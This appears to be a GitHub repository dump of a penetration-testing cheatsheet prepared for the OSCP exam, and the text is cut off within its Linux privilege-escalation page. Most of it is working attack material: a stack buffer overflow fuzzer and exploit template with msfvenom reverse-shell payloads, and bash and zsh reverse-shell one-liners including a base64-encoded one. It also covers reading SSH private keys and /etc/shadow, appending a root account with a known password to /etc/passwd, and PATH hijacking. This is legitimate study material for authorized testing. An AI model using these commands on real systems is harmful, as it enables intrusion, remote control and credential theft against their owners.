├── .gitignore ├── .tocignore ├── LICENSE ├── README.md ├── enum_and_exploit ├── README.md ├── buffer_overflow │ ├── README.md │ └── buffer_overflow_diagram.png ├── linux │ └── README.md ├── sqlite │ └── README.md ├── tcp-135-539-msrpc │ └── README.md ├── tcp-139-445-smb │ └── README.md ├── tcp-1433-mssql │ └── README.md ├── tcp-1521-oracle_db │ └── README.md ├── tcp-20-21-ftp │ └── README.md ├── tcp-2049-nfs │ └── README.md ├── tcp-22-ssh │ └── README.md ├── tcp-23-telnet │ └── README.md ├── tcp-25-465-587-smtp │ └── README.md ├── tcp-27017-mongodb │ └── README.md ├── tcp-3306-mysql │ └── README.md ├── tcp-3389-rdp │ └── README.md ├── tcp-53-dns │ └── README.md ├── tcp-5432-pgsql │ └── README.md ├── tcp-5985-5986-winrm │ └── README.md ├── tcp-6379-redis │ └── README.md ├── tcp-80-443-http │ ├── README.md │ └── domain_verifier.py ├── tcp-8082-9092-h2 │ └── README.md ├── tcp-873-rsync │ └── README.md ├── udp-161-snmp │ └── README.md ├── utils │ └── README.md └── windows │ └── README.md ├── toc_generator.py └── vm_config └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | # Project-specific stuff 2 | gh-md-toc 3 | .obsidian/** 4 | .idea/** 5 | *.iml 6 | *.ipr 7 | 8 | # General 9 | .DS_Store 10 | .AppleDouble 11 | .LSOverride 12 | 13 | # Icon must end with two \r 14 | Icon 15 | 16 | # Thumbnails 17 | ._* 18 | 19 | # Files that might appear in the root of a volume 20 | .DocumentRevisions-V100 21 | .fseventsd 22 | .Spotlight-V100 23 | .TemporaryItems 24 | .Trashes 25 | .VolumeIcon.icns 26 | .com.apple.timemachine.donotpresent 27 | 28 | # Directories potentially created on remote AFP share 29 | .AppleDB 30 | .AppleDesktop 31 | Network Trash Folder 32 | Temporary Items 33 | .apdisk 34 | 35 | # Byte-compiled / optimized / DLL files 36 | __pycache__/ 37 | *.py[cod] 38 | *$py.class 39 | 40 | # C extensions 41 | *.so 42 | 43 | # Distribution / packaging 44 | .Python 45 | build/ 46 | develop-eggs/ 47 | dist/ 48 | downloads/ 49 | eggs/ 50 | .eggs/ 51 | lib/ 52 | lib64/ 53 | parts/ 54 | sdist/ 55 | var/ 56 | wheels/ 57 | pip-wheel-metadata/ 58 | share/python-wheels/ 59 | *.egg-info/ 60 | .installed.cfg 61 | *.egg 62 | MANIFEST 63 | 64 | # PyInstaller 65 | # Usually these files are written by a python script from a template 66 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 67 | *.manifest 68 | *.spec 69 | 70 | # Installer logs 71 | pip-log.txt 72 | pip-delete-this-directory.txt 73 | 74 | # Unit test / coverage reports 75 | htmlcov/ 76 | .tox/ 77 | .nox/ 78 | .coverage 79 | .coverage.* 80 | .cache 81 | nosetests.xml 82 | coverage.xml 83 | *.cover 84 | *.py,cover 85 | .hypothesis/ 86 | .pytest_cache/ 87 | 88 | # Translations 89 | *.mo 90 | *.pot 91 | 92 | # Django stuff: 93 | *.log 94 | local_settings.py 95 | db.sqlite3 96 | db.sqlite3-journal 97 | 98 | # Flask stuff: 99 | instance/ 100 | .webassets-cache 101 | 102 | # Scrapy stuff: 103 | .scrapy 104 | 105 | # Sphinx documentation 106 | docs/_build/ 107 | 108 | # PyBuilder 109 | target/ 110 | 111 | # Jupyter Notebook 112 | .ipynb_checkpoints 113 | 114 | # IPython 115 | profile_default/ 116 | ipython_config.py 117 | 118 | # pyenv 119 | .python-version 120 | 121 | # pipenv 122 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 123 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 124 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 125 | # install all needed dependencies. 126 | #Pipfile.lock 127 | 128 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 129 | __pypackages__/ 130 | 131 | # Celery stuff 132 | celerybeat-schedule 133 | celerybeat.pid 134 | 135 | # SageMath parsed files 136 | *.sage.py 137 | 138 | # Environments 139 | .env 140 | .venv 141 | env/ 142 | venv/ 143 | ENV/ 144 | env.bak/ 145 | venv.bak/ 146 | 147 | # Spyder project settings 148 | .spyderproject 149 | .spyproject 150 | 151 | # Rope project settings 152 | .ropeproject 153 | 154 | # mkdocs documentation 155 | /site 156 | 157 | # mypy 158 | .mypy_cache/ 159 | .dmypy.json 160 | dmypy.json 161 | 162 | # Pyre type checker 163 | .pyre/ 164 | 165 | # CMake 166 | cmake-build-*/ 167 | 168 | # File-based project format 169 | *.iws 170 | 171 | # IntelliJ 172 | out/ 173 | 174 | # mpeltonen/sbt-idea plugin 175 | .idea_modules/ 176 | 177 | # JIRA plugin 178 | atlassian-ide-plugin.xml 179 | 180 | # Crashlytics plugin (for Android Studio and IntelliJ) 181 | com_crashlytics_export_strings.xml 182 | crashlytics.properties 183 | crashlytics-build.properties 184 | fabric.properties 185 | -------------------------------------------------------------------------------- /.tocignore: -------------------------------------------------------------------------------- 1 | README.md -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 Maksym Chernikov 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Pentest Everything 2 | 3 | This is my penetration testing cheatsheet. 4 | 5 | _I initially created this cheatsheet for the 2021 **OSCP** exam, but it is **no longer comprehensive** since the exam 6 | was drastically changed in early 2022._ 7 | 8 | [Github-md-toc-generator](https://github.com/maksyche/github-md-toc-generator) is used to generate Tables of Contents. 9 | 10 | **"Test it even if you think that someone has already covered it!"** 11 | 12 | ``` 13 | ─────█─▄▀█──█▀▄─█───── 14 | ────▐▌──────────▐▌──── 15 | ────█▌▀▄──▄▄──▄▀▐█──── 16 | ───▐██──▀▀──▀▀──██▌─── 17 | ──▄████▄──▐▌──▄████▄── 18 | ``` 19 | 20 | --- 21 | 22 | ### Contents 23 | 24 | - [Virtual Machine Configuration](/vm_config/README.md) 25 | - [Enumeration and Exploitation of Services and Systems](/enum_and_exploit/README.md) 26 | -------------------------------------------------------------------------------- /enum_and_exploit/README.md: -------------------------------------------------------------------------------- 1 | # Enumeration and exploitation 2 | * [Terminal logging](#terminal-logging) 3 | * [Subdomain Discovery](#subdomain-discovery) 4 | * [Port scanning](#port-scanning) 5 | * [Enumerating common ports and services](#enumerating-common-ports-and-services) 6 | 7 | ## Terminal logging 8 | - Always start logging terminal history before running any commands: 9 | ```bash 10 | script -f ./history-.log 11 | ``` 12 | 13 | ## Subdomain Discovery 14 | - Google: `site:*.` 15 | - Sublist3r _(better use VPN in case of blocks)_: 16 | ```bash 17 | python ~/sublist3r/sublist3r.py -d -o domains.txt -t 1 18 | ``` 19 | 20 | ## Port scanning 21 | - Scan common TCP ports of domains listed in the file: 22 | ```bash 23 | nmap -v -sV -sC -iL ./domains.txt -oN nmap.txt 24 | ``` 25 | - Scan common TCP ports: 26 | ```bash 27 | nmap -v -sV -sC 28 | ``` 29 | - Aggressively SYN scan all TCP ports: 30 | ```bash 31 | sudo nmap -v -p- -sS -A 32 | ``` 33 | - Scan all TCP ports for known vulnerabilities: 34 | ```bash 35 | sudo nmap -v -p- --script vuln 36 | ``` 37 | - Aggressively scan common UDP ports: 38 | ```bash 39 | sudo nmap -v --top-ports 20 -A -sU 40 | ``` 41 | 42 | ## Enumerating common ports and services 43 | - [TCP 20, 21 - File Transfer Protocol _(FTP)_](tcp-20-21-ftp/README.md) 44 | - [TCP 22 - Secure Shell _(SSH)_](tcp-22-ssh/README.md) 45 | - [TCP 23 - Telnet](tcp-23-telnet/README.md) 46 | - [TCP 25, 465, 578 - Simple Mail Transfer Protocol _(SMTP)_](tcp-25-465-587-smtp/README.md) 47 | - [TCP 53 - Domain Name System _(DNS)_](tcp-53-dns/README.md) 48 | - [TCP 80, 443 - HTTP](tcp-80-443-http/README.md) 49 | - [TCP 135, 539 - Microsoft Remote Procedure Call _(MSRPC)_](tcp-135-539-msrpc/README.md) 50 | - [TCP 139, 445 - Server Message Block _(SMB)_](tcp-139-445-smb/README.md) 51 | - [TCP 873 - Rsync](tcp-873-rsync/README.md) 52 | - [TCP 1433 - Microsoft SQL Server _(MSSQL)_](tcp-1433-mssql/README.md) 53 | - [TCP 1521 - Oracle DB](tcp-1521-oracle_db/README.md) 54 | - [TCP 2049 - Network File System _(NFS)_](tcp-2049-nfs/README.md) 55 | - [TCP 3306 - MySQL](tcp-3306-mysql/README.md) 56 | - [TCP 3389 - Remote Desktop Protocol _(RDP)_](tcp-3389-rdp/README.md) 57 | - [TCP 5432 - PostgreSQL](tcp-5432-pgsql/README.md) 58 | - [TCP 5985, 5986 - Windows Remote Management _(WinRM)_](tcp-5985-5986-winrm/README.md) 59 | - [TCP 6379 - Redis](tcp-6379-redis/README.md) 60 | - [TCP 8082, 9092 - H2](tcp-8082-9092-h2/README.md) 61 | - [TCP 27017 - MongoDB](tcp-27017-mongodb/README.md) 62 | - [UDP 161 - Simple Network Management Protocol _(SNMP)_](udp-161-snmp/README.md) 63 | - [Sqlite](sqlite/README.md) 64 | - [Buffer Overflow](buffer_overflow/README.md) 65 | - [Linux Privesc](linux/README.md) 66 | - [Windows Privesc](windows/README.md) 67 | - [Utilities](utils/README.md) 68 | -------------------------------------------------------------------------------- /enum_and_exploit/buffer_overflow/README.md: -------------------------------------------------------------------------------- 1 | # Stack Buffer Overflow enumeration and exploitation 2 | * [A piece of theory](#a-piece-of-theory) 3 | * [Definitions](#definitions) 4 | * [Graphical presentation](#graphical-presentation) 5 | * [Tools](#tools) 6 | * [Immunity Debugger](#immunity-debugger) 7 | * [Mona](#mona) 8 | * [Enumeration](#enumeration) 9 | * [Fuzzing](#fuzzing) 10 | * [Finding the EIP offset](#finding-the-eip-offset) 11 | * [Finding bad chars](#finding-bad-chars) 12 | * [Finding a jump point](#finding-a-jump-point) 13 | * [Exploitation](#exploitation) 14 | * [Generating a payload](#generating-a-payload) 15 | * [Adding NOPs](#adding-nops) 16 | * [Getting the reverse shell](#getting-the-reverse-shell) 17 | 18 | ## A piece of theory 19 | ### Definitions 20 | - **Stack frame** - function-specific section of the stack. 21 | - **ESP** _(Extended Stack Pointer)_ points to the current top of the stack. It's changed every time something is pushed/popped to the stack. 22 | - **EBP** _(Extended Base Pointer)_ points to the previous frame's base pointer. 23 | - **EIP** _(Extended Instruction Pointer)_ points to the next executing command. 24 | - **JMP ESP** - instruction to jump to the current top of the stack _(encoded as `\xFF\xE4`)_. 25 | - **NOP** _(no operation)_ - instruction to do nothing and jump to the next instruction in the flow _(Intel x86 NOP opcode is `\x90`)_. 26 | 27 | ### Graphical presentation 28 | ![](buffer_overflow_diagram.png) 29 | 30 | ## Tools 31 | ### Immunity Debugger 32 | - Download and install: https://debugger.immunityinc.com/ID_register.py 33 | - Always run it **as Administrator**. 34 | - Use `File -> Attach` for already running apps and services or use `File -> Open` to run executable _(some services should be restarted using `sc stop/start `)_. 35 | - Unpause application. 36 | - Use the Windows menu to jump between mona results, log data, and CPU. 37 | 38 | ### Mona 39 | - Download it: https://raw.githubusercontent.com/corelan/mona/master/mona.py 40 | - Copy it to the PyCommands folder _(default path is `C:\Program Files\Immunity Inc\Immunity Debugger\PyCommands`)_. 41 | - Set working directory for Mona in Immunity Debugger: 42 | ```bash 43 | !mona config -set workingfolder c:\mona\buffer_overflow 44 | ``` 45 | 46 | ## Enumeration 47 | ### Fuzzing 48 | - Create `fuzzer.py`: 49 | ```python 50 | import socket, time, sys 51 | 52 | ip = "" 53 | port = 54 | timeout = 5 55 | 56 | buffer = [] 57 | counter = 100 58 | while len(buffer) < 30: 59 | buffer.append("A" * counter) 60 | counter += 100 61 | 62 | for string in buffer: 63 | try: 64 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 65 | s.settimeout(timeout) 66 | connect = s.connect((ip, port)) 67 | s.recv(1024) 68 | print("Fuzzing with %s bytes" % len(string)) 69 | s.send(" " + string + "\r\n") # Add space after the command 70 | s.recv(1024) 71 | s.send("QUIT\r\n") 72 | s.recv(1024) 73 | s.close() 74 | except: 75 | print("Could not connect to " + ip + ":" + str(port)) 76 | sys.exit(0) 77 | time.sleep(1) 78 | ``` 79 | - Run using `python` or `python2`. 80 | 81 | ### Finding the EIP offset 82 | - Create the `exploit.py` file: 83 | ```python 84 | import socket 85 | 86 | ip = "" 87 | port = 88 | 89 | prefix = " " # Add space after the command 90 | offset = 0 91 | overflow = "A" * offset 92 | retn = "" 93 | padding = "" 94 | payload = "" 95 | postfix = "" 96 | 97 | buffer = prefix + overflow + retn + padding + payload + postfix 98 | 99 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 100 | 101 | try: 102 | s.connect((ip, port)) 103 | print("Sending evil buffer...") 104 | s.send(buffer + "\r\n") 105 | print("Done!") 106 | except: 107 | print("Could not connect.") 108 | ``` 109 | - Set the payload value: 110 | ```bash 111 | /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l # Value of fuzzing + couple hundred extra bytes. 112 | ``` 113 | - Run using `python` or `python2`. 114 | - Get EIP offset by running `pattern_offset.rb`: 115 | ```bash 116 | /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l -q 117 | ``` 118 | - Set EIP `offset` in the `exploit.py`, empty the `payload`, and set `retn` value to `BBBB`. 119 | - Run again and check the EIP register in the Registers window. It should be `42424242` now. 120 | 121 | ### Finding bad chars 122 | - Generate a bytearray using mona, and exclude the null byte _(`\x00`)_: 123 | ```bash 124 | !mona bytearray -b "\x00" 125 | ``` 126 | - Copy chars to the `payload` of the `exploit.py` and run it again: 127 | ```python 128 | \x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff 129 | ``` 130 | - Compare chars using mona: 131 | ```bash 132 | !mona compare -f C:\mona\buffer_overflow\bytearray.bin -a 133 | ``` 134 | - Note all bad chars except for the `00`. 135 | - Generate bytearray again excluding bad chars _(notice, often the byte after the bad char gets corrupted, so it's better to include only the first one of the sequence)_: 136 | ```bash 137 | !mona bytearray -b "\x00" 138 | ``` 139 | - Remove bad chars from the `payload` of the `exploit.py` and run it again. 140 | - Compare chars again. 141 | - Continue this process till there are no bad chars. 142 | 143 | ### Finding a jump point 144 | - Find all `jmp esp` using mona: 145 | ```bash 146 | !mona jmp -r esp -cpb "\x00" 147 | ``` 148 | - Take any of addresses that have no protection and put it in the `retn` variable of the `exploit.py`, but backwards _(for example: `625011AF -> \xaf\x11\x50\x62`)_. 149 | 150 | ## Exploitation 151 | ### Generating a payload 152 | - Generate a payload including all bad chars: 153 | ```bash 154 | msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -b "\x00" -f py # sometimes it's better to use C as the filetype 155 | ``` 156 | - Copy `buf` variable to the `exploit.py` file and set `payload` equal to it. 157 | 158 | ### Adding NOPs 159 | - Since pointers may change a bit it's better to add NOPs to "slide" to the right position _(add this to `exploit.py`)_: 160 | ```python 161 | padding = "\x90" * 16 # May be more than 16 162 | ``` 163 | 164 | ### Getting the reverse shell 165 | - Just listen to the reverse shell and run `exploit.py`: 166 | ```bash 167 | rlwrap nc -lvnp 443 168 | ``` 169 | -------------------------------------------------------------------------------- /enum_and_exploit/buffer_overflow/buffer_overflow_diagram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/maksyche/pentest-everything/ad01a1532aefce3e9111994e2bf05ba38f24803a/enum_and_exploit/buffer_overflow/buffer_overflow_diagram.png -------------------------------------------------------------------------------- /enum_and_exploit/linux/README.md: -------------------------------------------------------------------------------- 1 | # Linux privilege escalation 2 | * [Utilities](#utilities) 3 | * [Shell stabilization and interactivity](#shell-stabilization-and-interactivity) 4 | * [Useful reverse shells](#useful-reverse-shells) 5 | * [Port forwarding/tunneling](#port-forwardingtunneling) 6 | * [Copy files from/to the target](#copy-files-fromto-the-target) 7 | * [Autoenumeration _(LinPEAS)_](#autoenumeration-linpeas) 8 | * [Monitoring processes _(PSPY)_](#monitoring-processes-pspy) 9 | * [Autoenumeration _(Linux Smart Enumeration)_](#autoenumeration-linux-smart-enumeration) 10 | * [Linux Exploit Suggester](#linux-exploit-suggester) 11 | * [Manual enumeration](#manual-enumeration) 12 | * [System](#system) 13 | * [Users and groups](#users-and-groups) 14 | * [Apps and services](#apps-and-services) 15 | * [Network](#network) 16 | * [Files and folders](#files-and-folders) 17 | * [Possible escalation vectors in programs](#possible-escalation-vectors-in-programs) 18 | * [Compiling exploits and tools](#compiling-exploits-and-tools) 19 | * [Readable /etc/shadow exploit](#readable-etcshadow-exploit) 20 | * [Writable /etc/passwd or /etc/shadow exploit](#writable-etcpasswd-or-etcshadow-exploit) 21 | * [Exploiting wildcards](#exploiting-wildcards) 22 | * [Modifying `$PATH` for SUID/SUDO programs](#modifying-path-for-suidsudo-programs) 23 | * [Exploiting capabilities](#exploiting-capabilities) 24 | * [Python library hijacking](#python-library-hijacking) 25 | * [`LD_PRELOAD` exploit](#ld_preload-exploit) 26 | * [`LD_LIBRARY_PATH` exploit](#ld_library_path-exploit) 27 | * [Compiling a shared library running bash shell](#compiling-a-shared-library-running-bash-shell) 28 | * [Compiling a service running bash shell](#compiling-a-service-running-bash-shell) 29 | * [Permissions modification in NFS](#permissions-modification-in-nfs) 30 | 31 | ## Utilities 32 | ### Shell stabilization and interactivity 33 | - Listen to reverse shell: 34 | ```bash 35 | ncat -l 443 -v 36 | ``` 37 | - Upgrade the shell: 38 | ```bash 39 | python3 -c 'import pty;pty.spawn("/bin/bash")' 40 | ``` 41 | 42 | ### Useful reverse shells 43 | - Reverse shell oneliners (great website for shells: https://www.revshells.com/): 44 | ```bash 45 | bash -i >& /dev/tcp//443 0>&1 # bash 46 | bash -c "bash -i >& /dev/tcp//443 0>&1" # sh or dash 47 | zsh -c 'zmodload zsh/net/tcp && ztcp 443 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' # zsh 48 | ``` 49 | - Reverse shell encoded oneliner: 50 | ```bash 51 | echo "bash -c 'bash -i >& /dev/tcp//443 0>&1'" | base64 52 | echo '' | base64 --decode | bash 53 | ``` 54 | - TCP reverse shell executable: 55 | ```bash 56 | msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT=443 -f elf > shell.elf 57 | ``` 58 | 59 | ### Port forwarding/tunneling 60 | - SSH 61 | ```bash 62 | ssh -L :localhost: @ # Run on kali to forward a blocked port 63 | ``` 64 | - Chisel (download versions for the victim and the attacker https://github.com/jpillora/chisel/releases): 65 | ```bash 66 | wget https://github.com/jpillora/chisel/releases/download/v1.10.0/chisel_1.10.0_darwin_arm64.gz 67 | wget https://github.com/jpillora/chisel/releases/download/v1.10.0/chisel_1.10.0_linux_amd64.gz 68 | gunzip chisel_1.10.0_darwin_arm64.gz 69 | gunzip chisel_1.10.0_linux_amd64.gz 70 | sudo python3 -m http.server 80 71 | ``` 72 | ```bash 73 | # Attacker 74 | ./chisel_1.10.0_darwin_arm64 server --socks5 --reverse -p 1337 75 | 76 | # Victim 77 | wget http:///chisel_1.10.0_linux_amd64 78 | chmod 777 chisel_1.10.0_linux_amd64 79 | 80 | ./chisel_1.10.0_linux_amd64 client :1337 R::127.0.0.1: 81 | ``` 82 | 83 | ### Copy files from/to the target 84 | - SCP: 85 | ```bash 86 | scp @: . 87 | scp @: 88 | ``` 89 | - FTP: 90 | ```bash 91 | python3 -m pyftpdlib -w -p 2121 92 | ``` 93 | ```cmd 94 | ftp # anonymous and empty pass 95 | open 2121 96 | put 97 | ``` 98 | - HTTP: 99 | ```bash 100 | sudo python3 -m http.server 80 101 | 102 | wget http:/// 103 | curl http:/// --output 104 | ``` 105 | 106 | ## Autoenumeration _(LinPEAS)_ 107 | - Prepare: 108 | ```bash 109 | wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -O ./linpeas.sh 110 | 111 | cp ~/pentesting-tools/linpeas/linpeas.sh ./linpeas.sh # Or my stored version 112 | ``` 113 | - [Copy to the target](#copy-files-fromto-the-target) 114 | - Run: 115 | ```bash 116 | ./linpeas.sh > linpeas.txt 117 | ./linpeas.sh -a > linpeas.txt # Full search 118 | less -r linpeas.txt 119 | ``` 120 | 121 | ## Monitoring processes _(PSPY)_ 122 | - Prepare: 123 | ```bash 124 | cp ~/pentesting-tools/pspy/pspy32 ./pspy 125 | 126 | cp ~/pentesting-tools/pspy/pspy64 ./pspy # 64 bit version 127 | cp ~/pentesting-tools/pspy/pspy32s ./pspy # 32 bit small version 128 | cp ~/pentesting-tools/pspy/pspy64s ./pspy # 64 bit small version 129 | ``` 130 | - [Copy to the target](#copy-files-fromto-the-target) 131 | - Run: 132 | ```bash 133 | ./pspy # Needs process interrupt key to stop 134 | ``` 135 | 136 | ## Autoenumeration _(Linux Smart Enumeration)_ 137 | - Prepare: 138 | ```bash 139 | wget https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh -O ./lse.sh 140 | 141 | cp ~/pentesting-tools/lse/lse.sh ./lse.sh # Or my stored version 142 | ``` 143 | - [Copy to the target](#copy-files-fromto-the-target) 144 | - Run: 145 | ```bash 146 | ./lse.sh -i -l0 # Default level of information. Increase it up to 2 if nothing is found 147 | ``` 148 | 149 | ## Linux Exploit Suggester 150 | - Prepare: 151 | ```bash 152 | wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh 153 | 154 | cp ~/pentesting-tools/les/les.sh ./les.sh # Or my stored version 155 | ``` 156 | - [Copy to the target](#copy-files-fromto-the-target) 157 | - Run: 158 | ```bash 159 | ./les.sh 160 | ``` 161 | 162 | ## Manual enumeration 163 | ### System 164 | - System info: 165 | ```bash 166 | cat /etc/issue 167 | cat /etc/*-release 168 | cat /proc/version 169 | uname -a 170 | rpm -q kernel 171 | ``` 172 | - Environment variables: 173 | ```bash 174 | cat /etc/profile 175 | cat /etc/bashrc 176 | printenv 177 | env 178 | ``` 179 | 180 | ### Users and groups 181 | - Current user: 182 | ```bash 183 | id 184 | whoami 185 | ``` 186 | - Other users: 187 | ```bash 188 | cat /etc/passwd 189 | ``` 190 | - Groups: 191 | ```bash 192 | groups 193 | cat /etc/group 194 | ``` 195 | - User management files permissions: 196 | ```bash 197 | ls -l /etc/passwd 198 | ls -l /etc/shadow 199 | ls -l /etc/sudoers 200 | ls -l /etc/group 201 | ``` 202 | - `sudo` user privileges : 203 | ```bash 204 | sudo -l 205 | ``` 206 | - Shell history and configs: 207 | ```bash 208 | cat ~/.bash_profile 209 | cat ~/.bashrc 210 | cat ~/.profile 211 | cat ~/.bash_logout 212 | cat ~/.bash_history 213 | ``` 214 | - Mails: 215 | ```bash 216 | ls -l /var/mail 217 | ls -l /var/spool/mail 218 | ``` 219 | - SSH: 220 | ```bash 221 | cat /home//.ssh/authorized_keys 222 | cat /home//.ssh/identity.pub 223 | cat /home//.ssh/identity 224 | cat /home//.ssh/id_rsa.pub 225 | cat /home//.ssh/id_rsa 226 | cat /home//.ssh/id_dsa.pub 227 | cat /home//.ssh/id_dsa 228 | cat /etc/ssh/ssh_config 229 | cat /etc/ssh/sshd_config 230 | ``` 231 | 232 | ### Apps and services 233 | - Current processes 234 | ```bash 235 | ps aux 236 | ps -ef 237 | top 238 | ps aux | grep root 239 | ps -ef | grep root 240 | ``` 241 | - Installed apps: 242 | ```bash 243 | ls -lah /usr/bin/ 244 | ls -lah /usr/local/bin/ 245 | ls -lah /usr/local/sbin/ 246 | ls -lah /opt 247 | ``` 248 | - Scheduled jobs: 249 | ```bash 250 | cat /etc/crontab 251 | ls -l /var/spool/cron 252 | ls -l /var/spool/cron/crontabs 253 | cat /etc/cron.allow 254 | cat /etc/cron.deny 255 | cat /etc/anacrontab 256 | ``` 257 | - SUID/SGID programs: 258 | ```bash 259 | find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null # SUID and SGID with permissions 260 | find / -perm -u=s -type f 2>/dev/null # SUID only 261 | find / -perm -g=s -type f 2>/dev/null # SGID only 262 | ``` 263 | - Files with capabilities: 264 | ```bash 265 | getcap -r / 2>/dev/null 266 | ``` 267 | 268 | ### Network 269 | - General info: 270 | ```bash 271 | hostname 272 | ifconfig 273 | ``` 274 | - Open ports: 275 | ```bash 276 | lsof -i 277 | netstat -antup 278 | ss -tulpn 279 | nc -z -v 127.0.0.1 1-65535 280 | ``` 281 | - NFS shares: 282 | ```bash 283 | cat /etc/exports # Check if no_root_squash is set 284 | ``` 285 | 286 | ### Files and folders 287 | - List files in common folders: 288 | ```bash 289 | ls -lah ~ 290 | ls -lah /tmp 291 | ls -lah /opt 292 | ls -lah /opt/backup 293 | ls -lah /usr/local 294 | ls -lah /var/backups 295 | ls -lah /var/logs 296 | ls -lah /var/lib 297 | ls -lah /var/www 298 | ``` 299 | - File systems: 300 | ```bash 301 | mount 302 | df -h 303 | cat /etc/fstab 304 | ``` 305 | - Search for strings in file that don't start with `# ` _(useful for config files)_: 306 | ```bash 307 | cat | grep -v "^# " 308 | ``` 309 | - Search files contents: 310 | ```bash 311 | grep -rnw '/' -e '' 2> /dev/null 312 | ``` 313 | - Search for all .txt files: 314 | ```bash 315 | locate *.txt 316 | find / -type f -name "*.txt" 2>/dev/null 317 | ``` 318 | 319 | ## Possible escalation vectors in programs 320 | - https://gtfobins.github.io/ 321 | 322 | ## Compiling exploits and tools 323 | - Use this to compile exploits and tools if no specific instructions provided: 324 | ```bash 325 | gcc -o # add -fPIC for 64-bit machines 326 | g++ -o 327 | ``` 328 | - If a target machine doesn't have required tools to compile an exploit cross-compile it on Kali _(add `-m32` option for 32-bit machines)_. 329 | 330 | ## Readable /etc/shadow exploit 331 | - Just read the hash. 332 | - Or use `unshadow` (from `john` package on personal machine): 333 | ```bash 334 | unshadow passwd.txt shadow.txt > ./hash 335 | ``` 336 | - [Crack it](../utils/README.md#cracking-hashes) 337 | 338 | ## Writable /etc/passwd or /etc/shadow exploit 339 | - Even if these files are not writable, sometimes we can create symlinks to the files that can be made writable: 340 | ```bash 341 | ln -s /etc/passwd ~/passwd 342 | ``` 343 | - Create a password: 344 | ```bash 345 | openssl passwd -1 -salt 346 | ``` 347 | - Or use this prepared user: 348 | ```bash 349 | echo "new:\$1\$new\$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash" >> /etc/passwd 350 | ``` 351 | - Switch to the new user: 352 | ```bash 353 | su new # password:123 354 | ``` 355 | 356 | ## Exploiting wildcards 357 | - Check options for the command that uses the wildcard: https://gtfobins.github.io/gtfobins/ 358 | - Create files in the current directory with filenames as options: 359 | ```bash 360 | touch ./-- 361 | ``` 362 | 363 | ## Modifying `$PATH` for SUID/SUDO programs 364 | - Make alternative command which runs privileged bash: 365 | ```bash 366 | echo "/bin/bash -p" > /tmp/ 367 | chmod +x /tmp/ 368 | ``` 369 | - Modify `$PATH`: 370 | ```bash 371 | export PATH=/tmp:$PATH # To start searching for the in /tmp first 372 | ``` 373 | - Or run program and pass `$PATH` to it _(this may also work for 